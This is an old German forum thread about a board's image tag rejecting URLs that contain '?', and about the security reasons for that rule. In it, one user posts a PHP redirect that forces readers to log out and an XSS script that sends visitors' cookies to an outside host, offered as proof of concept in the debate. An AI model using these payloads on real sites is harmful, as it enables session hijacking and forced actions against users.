13.07.2004, 14:33
ja, also der image tag ist im moment ziemlich kaputt, wenn man da einen img link mit einem ? benutzt so wie andreas da, wird das bild einfach nicht angezeigt. gut find ich das nicht
13.07.2004, 14:33
14.07.2004, 17:13
Hi
@System, hab den beitrag mal hierher verschoben, da es hier besser reinpasst.
Es hat einen grund, weshalb es probleme mit dem "?" gibt. Man könnte sonst php befehle mit dem img-tag ausführen und niemand kann sich dagegen schützen.
@System, hab den beitrag mal hierher verschoben, da es hier besser reinpasst.
Es hat einen grund, weshalb es probleme mit dem "?" gibt. Man könnte sonst php befehle mit dem img-tag ausführen und niemand kann sich dagegen schützen.
14.07.2004, 18:39
naja, ich kann einfach ein script schreiben, dass dann folgendes macht:
auftag?php header("Location: http://80.190.243.221/login.php?do=logout"); ?zutag
wenn ich dieses php script bei image tag hier einlinke, was im moment erlaubt ist und auch nicht gesperrt werden kann (ich kann scripte auch script.jpg nennen, meinem apache ist das ega, wenn das verzeichnis stimmtl), dann würde jeder leser des beitrages sofort abgemeldet werden. da es so geht, kann man das ? auch direkt erlauben.
auftag?php header("Location: http://80.190.243.221/login.php?do=logout"); ?zutag
wenn ich dieses php script bei image tag hier einlinke, was im moment erlaubt ist und auch nicht gesperrt werden kann (ich kann scripte auch script.jpg nennen, meinem apache ist das ega, wenn das verzeichnis stimmtl), dann würde jeder leser des beitrages sofort abgemeldet werden. da es so geht, kann man das ? auch direkt erlauben.
14.07.2004, 18:45
und da fällt mir auf, was ist mit folgendem trick:
<script>document.write('<img src=http://pfuscher.funpic.de/formular.php?"'+encodeURI(document.cookie)+'">')</script>
das bild wird erzeugt durch
es geht natürlich auch als text:
<script>document.write(document.cookie)</script>
<script>document.write('<img src=http://pfuscher.funpic.de/formular.php?"'+encodeURI(document.cookie)+'">')</script>
das bild wird erzeugt durch
Zitat:script document.write('img src=http://pfuscher.funpic.de/formular.php?"'+encodeURI(document.cookie)+'"') /scriptallerdings mit entsprechnen dreieckigen klammern dazu, doch leider kann man die hier nicht schreiben, ohne dass sie als html interpretiert werden und ich bin zu faul nachzusehen, wie die entities lauten
es geht natürlich auch als text:
<script>document.write(document.cookie)</script>
14.07.2004, 19:17
14.07.2004, 20:41
man baut nicht mehr lücken damit ein, sondern man blockiert nur eine bestimmte funktionalität, nämlich querystrings bei urls, die negative und positiven nutzen haben können. jedoch wird die negative nutzung nicht verhinder, da man mit einfachen tricks ja doch wieder alles kann. wer will hier überhaupt für jemand anders php sache ausführen? da würde man doch eh nur gebannt werden